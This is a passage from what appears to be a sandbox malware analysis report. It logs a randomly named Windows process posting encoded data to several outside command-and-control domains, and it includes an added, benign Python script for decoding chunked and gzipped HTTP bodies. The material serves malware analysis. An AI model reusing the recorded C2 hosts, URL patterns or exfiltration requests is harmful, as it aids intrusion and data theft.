            Aug 2, 2024 13:54:13.348283052 CEST | 1236 | IN | Data Raw: bf 17 16 81 f6 70 80 41 65 35 cb 9a b0 cb 5d eb e0 40 a2 76 25 b2 5e c1 8b 69 4f e4 c9 b6 1c 98 1d 49 ee 65 26 94 16 7c c3 91 1d 8b 23 62 46 03 39 0c d7 95 66 9a 79 2d 2c 0c a3 81 15 22 e1 da 62 de 1d 2d 61 53 ec f8 4e 20 3a 8a d8 e6 03 9f 3b 3d
            Data Ascii: pAe5]@v%^iOIe&|#bF9fy-,"b-aSN :;= g4LfBnE$bV)|^_HN@"+Op}*Si:/M=Nw2MeiDE"-~"t [-uGZ[4_=7(co6Khf
            Aug 2, 2024 13:54:13.348309040 CEST | 976 | IN | Data Raw: 54 6f 73 9d 49 79 6e 62 30 f3 86 51 09 86 bb e1 70 17 51 fc 87 ea cf cd de ac a1 c8 4b 74 ab 4d 89 f7 5c 5f 2b a3 a9 08 9b 97 4f e3 6e 19 9e 27 39 5d 86 54 1b 5e 9d 2b 19 1d 27 f4 5d 3e 82 44 65 c7 83 70 78 be cc a9 34 ab 08 b2 54 a2 0e da 90 3e
            Data Ascii: TosIynb0QpQKtM\_+On'9]T^+']>Depx4T>`+(*eMnP/L2>|mtHLtM-fdDL6$Bk"-Az[:qO<t%*F$rp$KZ:zq;T3RWIx[X8r


            Session ID: 51, Source: 192.168.2.6:64521, Destination: 194.67.71.191:80, PID: 5700, Process: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:54:15.179466009 CEST | 1808 | OUT | POST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.b301.space
            Origin: http://www.b301.space
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 1245
            Referer: http://www.b301.space/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 4e 57 66 33 62 5a 52 6f 59 45 75 4a 36 4e 6f 4e 4d 41 6b 34 62 35 64 34 71 32 7a 54 67 50 67 71 33 31 62 65 75 65 6f 4d 73 79 47 4f 4f 57 6c 4b 75 51 54 2b 76 31 4f 33 39 41 38 42 73 4e 6e 6b 6d 46 62 71 2f 4b 6b 6f 47 58 42 53 30 31 73 76 55 6f 79 56 52 68 6b 71 71 55 63 59 73 4f 78 6d 62 6f 6b 2b 4c 6a 39 57 48 71 57 75 4d 52 34 67 35 30 44 6b 54 64 44 44 6e 46 73 45 75 2f 4e 71 4e 2b 47 74 56 31 71 55 79 56 79 66 46 64 50 42 65 55 55 50 6d 5a 48 48 57 2f 46 34 35 45 30 50 42 75 2f 62 57 71 52 72 33 44 79 66 44 77 6f 49 47 79 67 4a 42 78 46 46 2f 4d 41 4e 31 43 70 51 31 33 30 79 59 51 49 6c 71 30 6a 43 62 66 4c 70 71 58 6c 76 6a 37 36 2f 61 41 74 36 38 6b 6c 6d 7a 72 64 76 57 42 64 47 35 6c 39 46 33 4a 44 4e 4e 41 42 66 69 31 6d 75 51 6a 66 32 2f 78 65 4a 6e 4c 48 46 47 33 39 43 61 43 76 49 70 2b 33 70 68 48 6a 74 47 2b 42 42 76 2f 68 2f 46 54 53 69 76 49 4c 68 49 43 53 6b 4c 43 38 31 64 67 75 30 6c 63 6d 41 31 49 78 62 79 6a 54 6b 47 73 42 71 39 31 6e 67 53 58 4a 41 6b 77 58 44 4e [TRUNCATED]
            Data Ascii: blWd= [TRUNCATED]
            Aug 2, 2024 13:54:15.888492107 CEST | 1236 | IN | HTTP/1.1 404 Not Found
            Server: nginx
            Date: Fri, 02 Aug 2024 11:54:15 GMT
            Content-Type: text/html
            Transfer-Encoding: chunked
            Connection: close
            Content-Encoding: gzip
            Data Raw: 63 62 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 0d 96 94 48 a4 ed c6 6d 63 4b 32 d2 97 0d 03 fa 86 35 dd 30 38 29 71 45 5d 49 8c 29 5e 96 a4 6c 6b b1 81 b8 59 d7 0d cd 50 14 18 30 60 18 da 75 c3 be bb 69 dc ba 79 fd 0b d4 3f da 73 ee 25 25 92 92 63 a7 76 b1 29 b0 22 5e 9e 7b ee b9 e7 e5 39 87 e7 b2 71 b1 23 ed 68 e4 0b d6 8f 06 6e ab 41 df cc e5 5e af 59 12 5e 89 d9 2e 0f c3 66 c9 09 2d de e1 7e e4 6c 89 12 eb f0 88 d7 7d de 13 75 9a d7 2c f9 3c d8 74 bc 5e dd 0e c4 76 09 1c 04 ef b4 1a 03 11 71 66 f7 79 10 8a a8 59 fa e0 fa 2f ea af e2 9e 1a f5 f8 00 b3 02 d9 96 51 88 15 a4 17 09 0f 34 9e 74 bc 8e d8 39 91 aa 2b 5d 57 d2 42 cf 67 c6 03 bb 4f e2 26 74 7e 20 7d 11 44 a3 66 49 f6 56 43 27 12 16 89 91 59 7e 7b 7b db 68 bf b4 b8 64 84 3e b7 e7 4f 1b 06 6e 66 42 3f 8a fc 55 d3 cc cf 33 e7 ae e7 0c a0 ad d9 a9 23 39 0c 06 8e 27 8c 60 68 3a 66 a2 46 b3 e7 ca b6 95 5c 18 be d7 9b e5 d8 6d af 72 df b7 9c 4e 86 e5 f2 ab 8b 2b 57 96 af 2e af 5c 79 e5 e5 97 5f 59 49 27 69 5d 6f [TRUNCATED]
            Data Ascii: cbeZmo_qHmcK2508)qE]I)^lkYP0`uiy?s%%cv)"^{9q#hnA^Y^.f-~l}u,<t^vqfyY/Q4t9+]WBgO&t~ }DfIVC'Y~{{hd>OnfB?U3#9'`h:fF\mrN+W.\y_YI'i]o9bAv:Q[-xNp<D"'rE+z|'~?d06>?p1n=v_fpomh/607K)6KvB*5}e>mno9:go^3k;J]uIWiW5wG-Ro\~mya-(+$&=;rW[`^yuIIy4MltErz28[0#:aUrH#e+NWw"Z[<`6PZ|ieeJit#")Mbj#`&u'DVH+J:1gxs<Ki{S>T', |P`#[m&4]0+8VI%?b&5RBm0}sMw`eS pg),k;AV#127H}P`Q;CZ`YL)AHQ|XcO.?{=#^v@,ME>CrVvT|jJ< [TRUNCATED]
            Aug 2, 2024 13:54:15.888547897 CEST | 1236 | IN | Data Raw: bf 17 16 81 f6 70 80 41 65 35 cb 9a b0 cb 5d eb e0 40 a2 76 25 b2 5e c1 8b 69 4f e4 c9 b6 1c 98 1d 49 ee 65 26 94 16 7c c3 91 1d 8b 23 62 46 03 39 0c d7 95 66 9a 79 2d 2c 0c a3 81 15 22 e1 da 62 de 1d 2d 61 53 ec f8 4e 20 3a 8a d8 e6 03 9f 3b 3d
            Data Ascii: pAe5]@v%^iOIe&|#bF9fy-,"b-aSN :;= g4LfBnE$bV)|^_HN@"+Op}*Si:/M=Nw2MeiDE"-~"t [-uGZ[4_=7(co6Khf
            Aug 2, 2024 13:54:15.888554096 CEST | 976 | IN | Data Raw: 54 6f 73 9d 49 79 6e 62 30 f3 86 51 09 86 bb e1 70 17 51 fc 87 ea cf cd de ac a1 c8 4b 74 ab 4d 89 f7 5c 5f 2b a3 a9 08 9b 97 4f e3 6e 19 9e 27 39 5d 86 54 1b 5e 9d 2b 19 1d 27 f4 5d 3e 82 44 65 c7 83 70 78 be cc a9 34 ab 08 b2 54 a2 0e da 90 3e
            Data Ascii: TosIynb0QpQKtM\_+On'9]T^+']>Depx4T>`+(*eMnP/L2>|mtHLtM-fdDL6$Bk"-Az[:qO<t%*F$rp$KZ:zq;T3RWIx[X8r


            Session ID: 52, Source: 192.168.2.6:64522, Destination: 194.67.71.191:80, PID: 5700, Process: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:54:17.711461067 CEST | 521 | OUT | GET /fo8o/?blWd=AU3XYvZFaGSlytwuLg8MPaUQqx3yoZo+slWhncsJrkz7OmZN7i/xsh6l91syvPfChHr514cSZiYi12sQUpLBNWUGgXkiv5tYdsczWAt3YIqQCRozzWbYSNnfkFwi3fxcOtzIASs=&Ixe=Apq4tPPXNdTp2 HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Host: www.b301.space
            Connection: close
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Aug 2, 2024 13:54:18.417612076 CEST | 1236 | IN | HTTP/1.1 404 Not Found
            Server: nginx
            Date: Fri, 02 Aug 2024 11:54:18 GMT
            Content-Type: text/html
            Transfer-Encoding: chunked
            Connection: close
            Data Raw: 32 36 33 34 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 64 61 74 61 2d 70 61 67 65 2d 74 79 70 65 3d 22 70 61 72 6b 69 6e 67 2d 63 72 65 77 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 61 72 63 68 69 76 65 22 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 77 77 77 2e 62 33 30 31 2e 73 70 61 63 65 22 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 62 33 30 31 2e 73 70 [TRUNCATED]
            Data Ascii: 2634<!doctype html><html lang="en" class="is_adaptive" data-page-type="parking-crew"><head><meta charset="UTF-8"><meta name="robots" content="noindex"><meta name="robots" content="nofollow"><meta name="robots" content="noarchive"><meta property="og:site_name" content="www.b301.space"><meta property="og:url" content="http://www.b301.space/"><meta property="og:image" content="http://yourmine.ru/i/parking/glob_parking.png"><meta property="fb:app_id" content="280542925476675"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="parking" content="ape"><title> &nbsp;www.b301.space </title><link rel="stylesheet" media="all" href="/parking-crew.css"><style>body { background: #E5E5E5; }</style><link rel="icon" href="/favicon.ico" type="image/x-icon"><script>/*<![CDATA[*/window.trackScriptLoad = function(){};/*...*/</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScript [TRUNCATED]
            Aug 2, 2024 13:54:18.417706013 CEST | 1236 | IN | Data Raw: 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74
            Data Ascii: pt onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script><script type="text/javascript">var cname = "035524"; var identifier = "";</s
            Aug 2, 2024 13:54:18.417717934 CEST | 1236 | IN | Data Raw: 6d 3d 65 78 70 69 72 65 64 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 72 65 6e 65 77 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 52 65 6e 65 77 3c 2f 61 3e 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 67 2e 63
            Data Ascii: m=expired&utm_campaign=renew" target="_blank">Renew</a> <a href="https://www.reg.com/domain/new/rereg_details?dname=www.b301.space&utm_source=www.b301.space&utm_medium=expired&utm_campaign=expired" class="b-pcrew__button b-pcrew__button_type_g
            Aug 2, 2024 13:54:18.417776108 CEST | 1236 | IN | Data Raw: 73 3d 22 62 2d 70 63 72 65 77 5f 5f 62 75 74 74 6f 6e 20 62 2d 70 63 72 65 77 5f 5f 62 75 74 74 6f 6e 5f 74 79 70 65 5f 67 68 6f 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 22 3e 4f 72 64 65
            Data Ascii: s="b-pcrew__button b-pcrew__button_type_ghost" target="_blank" rel="noopener">Order service</a></div></div><div class="b-pcrew-content__item b-pcrew-content__item_type_select" onclick="location.href='https://www.reg.com/buy/domains/?query=www.
            Aug 2, 2024 13:54:18.417787075 CEST | 1236 | IN | Data Raw: 77 77 77 2e 62 33 30 31 2e 73 70 61 63 65 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 65 78 70 69 72 65 64 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 22 3e d0 9e d0 bf d1 80 d0 b5 d0 b4 d0 b5 d0 bb d0 b5 d0 bd d0 b8 d0 b5 20 49 50 3c 2f 61 3e 20 3c 61 20 63
            Data Ascii: www.b301.space&utm_medium=expired&utm_campaign"> IP</a> <a class="b-parking-footer__link" href="https://www.reg.ru/web-tools/geoip?utm_source=www.b301.space&utm_medium=expired&utm_campaign">
            Aug 2, 2024 13:54:18.417799950 CEST | 1236 | IN | Data Raw: 70 73 3a 2f 2f 77 77 77 2e 72 65 67 2e 72 75 2f 64 65 64 69 63 61 74 65 64 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 77 77 77 2e 62 33 30 31 2e 73 70 61 63 65 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 65 78 70 69 72 65 64 26 75 74 6d 5f 63 61 6d 70 61 69
            Data Ascii: ps://www.reg.ru/dedicated/?utm_source=www.b301.space&utm_medium=expired&utm_campaign">Dedicated</a></div></div></div><div class="b-parking-footer__wrapper"><div class="b-parking-footer__partner"><span class="b-parking-footer__partner-text"><a
            Aug 2, 2024 13:54:18.417864084 CEST | 1236 | IN | Data Raw: 72 65 66 20 2b 20 27 72 69 64 3d 27 20 2b 20 64 61 74 61 2e 72 65 66 5f 69 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 69 66 20 28 20 64 61 74 61 2e 64 6e 61 6d 65 2e 6d 61 74 63 68
            Data Ascii: ref + 'rid=' + data.ref_id; } } if ( data.dname.match(/\.(ru|su|)$/g) ) { var rereg_links = document.querySelectorAll('.rereg'); for ( var i = 0; i < rereg_links.length; i++) {
            Aug 2, 2024 13:54:18.417879105 CEST | 1236 | IN | Data Raw: 61 74 63 68 28 20 2f 5e 70 75 6e 79 2f 20 29 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 74 65 78 74 20 3d 20 73 70 61 6e 73 5b 20 69 20 5d 5b 20 74 20 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65
            Data Ascii: atch( /^puny/ ) ) { var text = spans[ i ][ t ]; text = punycode.ToUnicode( text ); spans[ i ][ t ] = text; } else if ( spans[ i ].className.match( /^no-puny/ ) ) { spa
            Aug 2, 2024 13:54:18.417891979 CEST | 55 | IN | Data Raw: 74 3e 3c 21 2d 2d 20 2f 59 61 6e 64 65 78 2e 4d 65 74 72 69 6b 61 20 63 6f 75 6e 74 65 72 20 2d 2d 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
            Data Ascii: t>... /Yandex.Metrika counter --></body></html>0


            Session ID: 53, Source: 192.168.2.6:64523, Destination: 154.215.72.110:80, PID: 5700, Process: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:54:26.497638941 CEST | 525 | OUT | GET /fo8o/?Ixe=Apq4tPPXNdTp2&blWd=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnyIi7V/S5J9AzlXPHqpluzE36hxZsh30r8poflPmNwlfmk35jvL8= HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Host: www.3xfootball.com
            Connection: close
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Aug 2, 2024 13:54:27.402843952 CEST | 691 | IN | HTTP/1.1 404 Not Found
            Server: nginx
            Date: Fri, 02 Aug 2024 11:54:27 GMT
            Content-Type: text/html
            Content-Length: 548
            Connection: close
            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
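The response bodies captured above come in three framings: the www.b301.space 404s are chunked (the Data Raw starts with the hex chunk size "cbe", then CRLF) and gzip-compressed (the 1f 8b magic follows), which is why their Data Ascii renderings are unreadable; the parking page is chunked but uncompressed (chunk size "2634"); and the www.3xfootball.com 404 is a plain body with Content-Length: 548. The report also truncates every hex dump, so a decoder used on such excerpts has to cope with a stream that stops mid-chunk. The script below is an added example, not part of the Joe Sandbox report: it strips the chunked framing, gunzips when the headers say so, and recovers what it can from a truncated capture. Its input is constructed by the script itself: the standard nginx 404 page (which, with nginx's six padding comments, is exactly the 548 bytes the www.3xfootball.com response declares) compressed and chunked in memory, since the page's own hex dumps are incomplete.

```python
"""Decode captured HTTP/1.1 response bodies: chunked framing plus optional gzip.

Added example, not part of the Joe Sandbox report. The sample input is
constructed here (the standard nginx 404 body, gzip-compressed and chunked by
this script); the captured dumps above are truncated and cannot be decoded.
"""
import gzip
import zlib

GZIP_MAGIC = b"\x1f\x8b"

# Standard nginx 404 body, including the six padding comments nginx appends so
# that MSIE and Chrome do not substitute their own "friendly" error page.
NGINX_404 = (
    b"<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n"
    b"<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx</center>\r\n"
    b"</body>\r\n</html>\r\n"
) + b"<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n" * 6


def dechunk(raw: bytes, allow_partial: bool = False) -> bytes:
    """Strip chunked transfer framing. With allow_partial, a capture cut off
    mid-stream yields the chunk bytes that are present instead of raising."""
    out, pos = bytearray(), 0
    while True:
        eol = raw.find(b"\r\n", pos)
        try:
            if eol < 0:
                raise ValueError("truncated chunk-size line")
            size = int(raw[pos:eol].split(b";", 1)[0], 16)   # drop chunk extensions
        except ValueError:
            if allow_partial:
                return bytes(out)
            raise
        pos = eol + 2
        if size == 0:
            return bytes(out)                                # trailers, if any, ignored
        piece = raw[pos:pos + size]
        out += piece
        if len(piece) < size or raw[pos + size:pos + size + 2] != b"\r\n":
            if allow_partial:
                return bytes(out)
            raise ValueError("truncated or malformed chunk")
        pos += size + 2


def gunzip(body: bytes, allow_partial: bool = False) -> bytes:
    """gzip.decompress() insists on a complete stream with a valid trailer;
    a decompressobj hands back whatever the bytes that are present decode to."""
    if not body.startswith(GZIP_MAGIC):
        raise ValueError("Content-Encoding: gzip but body lacks the 1f 8b magic")
    if allow_partial:
        return zlib.decompressobj(16 + zlib.MAX_WBITS).decompress(body)
    return gzip.decompress(body)


def decode_body(headers: dict, raw: bytes, allow_partial: bool = False) -> bytes:
    """Apply, in order, the framing and then the encoding the headers declare."""
    h = {k.lower(): v.strip().lower() for k, v in headers.items()}
    body = raw
    if h.get("transfer-encoding") == "chunked":
        body = dechunk(raw, allow_partial)
    elif "content-length" in h:
        body = raw[: int(h["content-length"])]
    if h.get("content-encoding") == "gzip":
        body = gunzip(body, allow_partial)
    return body


def chunked(data: bytes, size: int) -> bytes:
    """Apply chunked framing; used only to build the constructed sample."""
    out = bytearray()
    for i in range(0, len(data), size):
        piece = data[i:i + size]
        out += f"{len(piece):x}\r\n".encode() + piece + b"\r\n"
    return bytes(out + b"0\r\n\r\n")


def make_sample(chunk_size: int = 40) -> bytes:
    """Constructed wire bytes: NGINX_404, gzip-compressed, then chunked."""
    return chunked(gzip.compress(NGINX_404), chunk_size)


GZIP_CHUNKED = {"Transfer-Encoding": "chunked", "Content-Encoding": "gzip"}

if __name__ == "__main__":
    raw = make_sample()
    print(decode_body(GZIP_CHUNKED, raw)[:60])
    cut = raw[: 2 * len(raw) // 3]                          # simulate a truncated dump
    print(len(decode_body(GZIP_CHUNKED, cut, allow_partial=True)), "bytes recovered")
```

Two points of the design matter when this is pointed at real captures: the gzip magic check catches the common mistake of gunzipping a body whose Content-Encoding header was inherited from a proxy, and the partial path uses a zlib decompressobj rather than gzip.decompress because a truncated stream has no trailer and gzip.decompress refuses it outright.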


            Session ID: 54, Source: 192.168.2.6:64524, Destination: 52.25.92.0:80
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:54:34.209228039 CEST | 786 | OUT | POST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.kasegitai.tokyo
            Origin: http://www.kasegitai.tokyo
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 209
            Referer: http://www.kasegitai.tokyo/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 4a 5a 76 70 77 56 49 68 75 42 43 58 53 48 62 6c 32 71 6c 5a 2b 79 49 57 5a 2b 61 46 2f 2f 42 72 6b 77 51 5a 6d 6c 71 64 38 54 35 32 76 54 57 45 67 77 41 56 68 42 38 69 6e 33 6f 45 74 35 2f 53 55 34 79 6d 76 43 4e 39 73 66 79 73 79 67 68 45 77 5a 4f 31 47 62 49 4d 4c 67 45 53 42 69 78 58 65 77 45 46 2f 33 64 62 2b 4f 4f 6c 58 45 70 6a 39 6f 58 75 59 57 54 43 67 42 68 32 50 37 39 7a 47 73 76 43 58 68 7a 62 50 30 42 39 74 70 48 4a 50 4e 6d 66 66 33 4f 6a 34 68 39 38 78 6f 45 48 42 33 45 74 49 7a 2f 63 65 67 36 4e 67 68 4d 58 57 72 64 61 4a 39 74 62 66 31 64 53 36 4e 39 38
            Data Ascii: blWd=5JlKLzaKVp1wJZvpwVIhuBCXSHbl2qlZ+yIWZ+aF//BrkwQZmlqd8T52vTWEgwAVhB8in3oEt5/SU4ymvCN9sfysyghEwZO1GbIMLgESBixXewEF/3db+OOlXEpj9oXuYWTCgBh2P79zGsvCXhzbP0B9tpHJPNmff3Oj4h98xoEHB3EtIz/ceg6NghMXWrdaJ9tbf1dS6N98
            Aug 2, 2024 13:54:34.837361097 CEST | 1236 | IN | HTTP/1.1 200 OK
            Server: nginx
            Date: Fri, 02 Aug 2024 11:54:34 GMT
            Content-Type: text/html; charset=UTF-8
            Transfer-Encoding: chunked
            Connection: close
            Vary: Accept-Encoding
            Content-Encoding: gzip
            Data Raw: 38 33 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 ff 73 13 c7 15 ff 59 fe 2b 96 9b 0e 27 25 a7 3b db 80 6b 6c 9d 18 08 38 d0 42 48 8b 33 6d c7 e3 61 56 ba d5 dd da 7b b7 e2 6e 25 59 31 cc f8 4e 84 f2 2d 85 36 2d 9d 90 74 12 1a 9a b4 74 06 3a 0d ed b4 c1 0d ff 4b 17 19 f8 89 7f a1 6f ef 24 eb 8b 4d 48 a6 f9 c1 a7 db dd b7 9f f7 de e7 bd dd 7b cf 13 a5 3d 0e af 8a 76 9d 20 4f f8 ac 3c 51 52 3f 88 e1 c0 b5 b5 95 ba a6 26 08 76 ca 13 b9 92 4f 04 46 55 0f 87 11 11 b6 f6 ce e2 42 71 56 db 9e 0f b0 4f 6c ad 49 49 ab ce 43 a1 a1 2a 0f 04 09 40 ae 45 1d e1 d9 0e 69 d2 2a 29 a6 03 03 d1 80 0a 8a 59 31 aa 62 46 ec 29 03 f9 78 8d fa 0d 7f 30 d1 88 48 98 8e 70 05 26 02 9e 2a 12 54 30 52 de 3f b9 0f 2d f0 b0 42 1d 87 04 25 2b 9b 84 55 46 83 55 14 12 66 6b 91 68 33 12 79 84 80 1d ca 33 5b 13 64 4d 58 d5 28 d2 90 17 92 9a ad 59 a9 88 a9 66 d4 d6 3d c5 e2 b0 17 21 af 70 11 0d f9 10 70 1a 38 64 4d 43 56 b9 58 ec 6d 58 a2 35 e4 0a 82 4e 1c 43 07 97 d5 5c 0a 39 ae 0f 16 72 a6 1b 62 87 02 10 5a 87 51 ae 46 99 20 e1 1c [TRUNCATED]
            Data Ascii: 831XsY+'%;kl8BH3maV{n%Y1N-6-tt:Ko$MH{=v O<QR?&vOFUBqVOlIIC*@Ei*)Y1bF)x0Hp&*T0R?-B%+UFUfkh3y3[dMX(Yf=!pp8dMCVXmX5NC\9rbZQF x@aIH)Bor"v)`(".Z#|p`-/->7HK" M0v.\&Qv1F|X|TX\6&r+ Pd`p>${t}~Q;"lDahZfVf!}a5CPwIHqxH+F_([AjCfy1dxx0q(EX,%+;&i.UFU*WW+&m>l(KH 2V;M<B]|RCYUoi>C:4W4hy%+3^f(kVkJ:%]^i'(t@<853;;;GMuBjpUww7y`02!@>vn(R"J41Nz)hOoWT>~S$+RlIogQ)[qLR\ md@nsEv|)O/^=(7R%,s|!; [TRUNCATED]
            Aug 2, 2024 13:54:34.837378025 CEST 1078 IN Data Raw: 75 0b b6 3d d8 35 d6 c0 4c 83 14 1d 0e 11 0c d2 4c f5 b9 83 19 33 eb 5e 7d 67 08 d3 eb 3d e0 35 ce 18 6f 81 67 f1 07 32 06 fb ae c8 f8 1a 3c bb 77 af 6c 7d f4 50 76 1e c1 73 eb d6 df 54 1c 64 f2 9b 67 77 ae cb f8 33 19 7f 2e e3 1b 32 fe 54 c6 bf
            Data Ascii: u=5LL3^}g=5og2<wl}PvsTdgw3.2TEeu__0(:V!qFT8&][' gnl0q!^]gVY9,o]y[O[E2$.2RP!z2y G2C2RKR;


            Target ID: 0
            Start time: 07:50:22
